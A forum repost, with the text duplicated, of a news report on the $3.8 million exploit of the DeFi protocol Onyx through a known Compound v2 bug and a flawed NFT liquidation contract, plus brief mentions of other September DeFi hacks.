Friend
Professional
- Messages
- 2,653
- Reaction score
- 850
- Points
- 113
The protocol was attacked again due to a bug in Compound Finance v2.
On September 26, the decentralized finance (DeFi) protocol Onyx was attacked, as a result of which attackers managed to steal assets worth $3.8 million. Information about the incident was published by the blockchain security platform PeckShield. The main cause of the cyberattack was a well-known bug in the Compound Finance version 2 codebase, which was previously used to exploit Onyx vulnerabilities in November last year.
According to the report, the vulnerability existed in the NFT liquidation contract, which also facilitated the implementation of the attack. The problem was that the contract incorrectly validated user data entry, which allowed attackers to inflate the reward for self-destruct assets.
The Onyx team confirmed the use of this vulnerable contract and identified it as the main factor that led to the incident
According to PeckShield, the attackers withdrew 4.1 million virtual USD (VUSD), 7.35 million Onyxcoin (XCN), 0.23 Wrapped Bitcoin (WBTC), about $5000 in the Dai (DAI) stablecoin, and $50,000 in the USDt (USDT) stablecoin. The total amount of losses amounted to more than $3.8 million.
A known vulnerability in the Compound Finance v2 codebase has repeatedly caused attacks on various decentralized finance protocols. In April 2023, the Hundred Finance protocol suffered due to the same bug, and in October 2023, it was used against Onyx for the first time.
Exploitation of the vulnerability is possible only in an "empty market" environment, when there is no liquidity in the market. This usually happens when a new market is launched, which is what made the Onyx protocol vulnerable. However, according to the protocol team, the main cause of the incident was an error in the NFT liquidation contract.
PeckShield also supported this version, noting that the problematic contract was an additional factor contributing to the attack. The bug was due to insufficient verification of the data entered by users, which made it possible for the attackers to manipulate the size of the liquidation rewards.
This incident is not an isolated case in the field of decentralized finance (DeFi). In September alone, several other projects were also affected by vulnerabilities. For example, on September 27, the Bedrock protocol lost more than $2 million due to an error in the uniBTC contract, and on September 23, the Bankroll Network project lost $230,000 in an attack in which attackers exploited the "buyFor" vulnerability to increase their profits.
Source
On September 26, the decentralized finance (DeFi) protocol Onyx was attacked, as a result of which attackers managed to steal assets worth $3.8 million. Information about the incident was published by the blockchain security platform PeckShield. The main cause of the cyberattack was a well-known bug in the Compound Finance version 2 codebase, which was previously used to exploit Onyx vulnerabilities in November last year.
According to the report, the vulnerability existed in the NFT liquidation contract, which also facilitated the implementation of the attack. The problem was that the contract incorrectly validated user data entry, which allowed attackers to inflate the reward for self-destruct assets.
The Onyx team confirmed the use of this vulnerable contract and identified it as the main factor that led to the incident
According to PeckShield, the attackers withdrew 4.1 million virtual USD (VUSD), 7.35 million Onyxcoin (XCN), 0.23 Wrapped Bitcoin (WBTC), about $5000 in the Dai (DAI) stablecoin, and $50,000 in the USDt (USDT) stablecoin. The total amount of losses amounted to more than $3.8 million.
A known vulnerability in the Compound Finance v2 codebase has repeatedly caused attacks on various decentralized finance protocols. In April 2023, the Hundred Finance protocol suffered due to the same bug, and in October 2023, it was used against Onyx for the first time.
Exploitation of the vulnerability is possible only in an "empty market" environment, when there is no liquidity in the market. This usually happens when a new market is launched, which is what made the Onyx protocol vulnerable. However, according to the protocol team, the main cause of the incident was an error in the NFT liquidation contract.
PeckShield also supported this version, noting that the problematic contract was an additional factor contributing to the attack. The bug was due to insufficient verification of the data entered by users, which made it possible for the attackers to manipulate the size of the liquidation rewards.
This incident is not an isolated case in the field of decentralized finance (DeFi). In September alone, several other projects were also affected by vulnerabilities. For example, on September 27, the Bedrock protocol lost more than $2 million due to an error in the uniBTC contract, and on September 23, the Bankroll Network project lost $230,000 in an attack in which attackers exploited the "buyFor" vulnerability to increase their profits.
Source
